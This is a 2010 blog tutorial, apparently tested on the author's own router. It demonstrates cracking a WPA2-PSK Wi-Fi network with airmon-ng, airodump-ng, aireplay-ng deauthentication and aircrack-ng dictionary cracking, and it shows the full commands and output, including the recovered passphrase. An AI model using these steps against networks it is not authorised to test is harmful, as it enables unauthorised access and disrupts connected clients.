Hacking WPA2 Wireless Networks…

June 20, 2010 at 7:17 pm (Security, Wireless)

Hey,

I decided to document how to break into a WPA2 enabled wireless network, so I setup my LinkSys WRT54G wireless router over the weekend, here is how I broke into it:

root@bt:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy1]
(monitor mode disabled)

Start the wireless card in monitor mode:

root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy1]
(monitor mode enabled on mon0)

Now we want to run airodump-ng and filter out all the other access points and clients so that we only capture the handshake for our target access point (HackMe):

root@bt:~# airodump-ng --bssid 00:0C:41:9D:C7:5C --channel 6 --write HackMe-Demo mon0

CH 6 ][ Elapsed: 32 s ][ 2010-06-20 19:44 ][ WPA handshake: 00:0C:41:9D:C7:5C

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:0C:41:9D:C7:5C 0 100 316 38 0 6 54 WPA2 CCMP PSK HackMe]

BSSID STATION PWR Rate Lost Packets Probes

00:0C:41:9D:C7:5C 00:21:5C:90:2D:89 0 1 - 1 126 456 HackMe

root@bt:~#

Whilst we leave airodump-ng capturing packets and waiting for the WPA Handshake, we can speed things up a little using aireplay-ng. We can force one of the associated clients to de-auth and it will automatically re-authenticate itself with the access point allowing us to capture the WPA Handshake:

root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:42 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:43 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [126|184 ACKs]
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:48 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:48 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [ 0|169 ACKs]
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:50 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:51 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [185|179 ACKs]
root@bt:~#

Excellent, as you can see we managed to capture the WPA Handshake, let’s crack it and get the WPA passphrase we can then use to connect to the wireless network:

CH 6 ][ Elapsed: 32 s ][ 2010-06-20 19:44 ][ WPA handshake: 00:0C:41:9D:C7:5C


root@bt:~# aircrack-ng -a 2 -b 00:0C:41:9D:C7:5C -e HackMe -w password.txt HackMe-Demo-01.cap
Opening HackMe-Demo-01.cap
Reading packets, please wait...


Aircrack-ng 1.1 r1729


[00:00:00] 4 keys tested (67.32 k/s)


KEY FOUND! [ password ]


Master Key : 52 EC 07 C0 95 E6 7B 26 DD 40 59 67 10 7C F6 F7
BE EF E6 66 8D 70 A6 1C 56 BE F5 DD A2 B8 5D 32

Transient Key : 41 3E E2 11 47 CA DA EC 39 FA B8 23 79 4C 01 6A
AC B3 C0 45 FE 62 3F BF 4F 0A A9 B0 63 A1 AC 2E
D4 9C C6 09 C1 A9 82 A8 68 1B 71 BC 65 72 BE 97
C6 A8 2F A9 12 DA 08 C6 73 A5 90 DD E9 EF 5F 66

EAPOL HMAC : CA E1 1F 29 45 9A 1D 5D 1B 25 BF 51 92 1A 95 A9
root@bt:~#

Yay! We got the passphrase, which was “password” 🙂

Advertisements

3 Comments

  1. Spoon Rest said,

    wireless routers are very necessary nowadays because we do not want so many wires running around the home ..:

  2. Martha Thomson said,

    I am very thankful to this topic because it really gives useful information *’:

  3. Jack said,

    Dont we need a dictionary for this attack.. which u did use?… u didnt mention it

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: